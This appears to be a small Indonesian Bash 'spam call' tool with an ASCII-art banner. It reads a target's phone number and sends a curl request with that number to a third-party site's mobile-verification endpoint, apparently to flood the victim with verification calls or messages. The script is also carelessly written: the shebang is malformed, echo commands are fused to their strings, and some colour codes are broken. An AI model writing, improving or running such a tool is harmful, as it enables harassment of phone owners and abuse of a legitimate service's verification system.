#!bin/bash
bi='\033[34;1m7' #biru
ij='\033[32;1m' #ijo
pr='\033[35;1m' #purple
cy='\033[36;1m' #cyan
me='\033[31;1m' #merah
pu='\033[37;1m' #putih
ku='\033[33;1m' #kuning
or='\033[1;38;5;208m' #Orange
clear
echo"\033[31;1m        _"
echo"\033[31;1m       / \      _-'"
echo"\033[31;1m     _/|  \-''- _ /"
echo"\033[31;1m__-' { |          \"
echo"\033[31;1m    /             \"
echo"\033[31;1m    /       "o.  |o }"
echo"\033[31;1m    |            \ ;"
echo"\033[31;1m                  ',"
echo"\033[31;1m       \_         __\"
echo"\033[31;1m         ''-_    \.//"
echo"\033[31;1M           / '-____'"
echo"\033[31;1m          /"
echo"\033[31;1m        _'"
echo"\033[31;1m      _-'"
echo '
[1], Spam Call
[2], Exit Tools                                            '

echo
read -p "Masukan Pilihan Anda : " pil
if [[ $pil == 1 ]]; then
read -p "Masukan No Target : " nomor
link="https://id.jagreward.com/member/verify-mobile/$nomor"
curl -s $link
else
echo "Trima Kasih Sudah Menggunakan Tools ini"
exit
fi
echo
